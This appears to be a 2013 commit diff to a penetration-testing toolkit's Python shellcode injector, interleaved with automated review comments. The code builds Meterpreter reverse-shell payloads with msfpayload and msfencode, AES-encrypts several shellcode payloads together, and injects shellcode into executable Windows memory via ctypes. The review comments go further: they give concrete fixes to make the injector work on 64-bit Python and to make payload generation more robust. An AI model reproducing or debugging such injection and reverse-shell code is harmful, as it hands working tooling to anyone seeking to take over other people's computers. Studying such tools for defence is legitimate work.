Fixed a large bug in multi-pyinjector which would cause it to not work properly.

This commit is contained in:
TrustedSec 2013-07-29 11:03:56 -04:00
parent 8b77266adf
commit 20c1d6b4de
3 changed files with 6 additions and 3 deletions


@ -387,6 +387,7 @@ try:
print_status("Generating the payload via msfpayload and generating alphanumeric shellcode...")
subprocess.Popen("ruby %s/msfpayload %s LHOST=%s %s EXITFUNC=thread R > %s/meterpreter.raw" % (path,choice9,choice2,portnum,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("ruby %s/msfencode -e x86/alpha_mixed -i %s/meterpreter.raw -t raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (path,setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# define, this will eventually be all of our payloads
multipyinject_payload = ""
@ -394,6 +395,8 @@ try:
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
os.remove("%s/meta_config_multipyinjector" % (setdir))
while 1:
if choice1 == "shellcode/multipyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n")
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
@ -454,14 +457,14 @@ try:
# break out of the loop if we are only using one payload else keep on
if choice1 == "shellcode/pyinject": break
multipyinject_payload += shellcode + ","
# get rid of tail comma
if multipyinject_payload.endswith(","):
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
# we first need to encrypt the payload via AES 256
# def encryptAES(secret, data):
print_status("Encrypting the shellcode via 256 AES encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
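Review bot: In the first hunk (`@ -387,6 +387,7`), both `subprocess.Popen(..., stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()` calls never drain the pipes, so if msfpayload or msfencode writes more than the pipe buffer the child blocks and `.wait()` hangs, and the exit status is discarded, so a failed msfpayload leaves an empty `meterpreter.raw` that the msfencode step then consumes silently. Those command strings also interpolate operator-entered values (`choice2` as LHOST, `portnum`) straight into a shell line, so a value containing shell metacharacters changes the command; it is the local operator's own input, but wrapping each with `pipes.quote()` costs nothing. I would replace each `.wait()` with `proc = subprocess.Popen(...)` / `_, err = proc.communicate()` followed by `if proc.returncode != 0:` reporting `err` and abandoning the payload build instead of running the next step. The enclosing `try:` begins before the hunk, so how such a failure should propagate is not visible here.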


@ -27,7 +27,7 @@ def injection(sc):
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
buf = (ctypes.c_char * len(shellcode)).from_buffer(sc)
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
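Review bot: `ctypes.c_int(ptr)` on the `VirtualLock` and `RtlMoveMemory` calls silently truncates the buffer address to 32 bits (presumably the `VirtualAlloc` that produced `ptr`, which starts before the hunk, has the same default `c_int` restype), so under a 64-bit Python the copy goes to a bogus address whenever the allocation lands above 4 GiB; the `len(sc)` fix does not change that. Passing `ctypes.c_void_p(ptr)` here and setting `ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p` before the allocation avoids the truncation. Separately, `from_buffer(sc)` requires a writable buffer, so a `str` argument raises a TypeError where `from_buffer_copy(sc)` would accept either a `str` or a `bytearray` — I cannot see `sc`'s type because `injection` begins outside the hunk. The `0x40` on the first line is the protection flag and deserves a comment, `# PAGE_EXECUTE_READWRITE`.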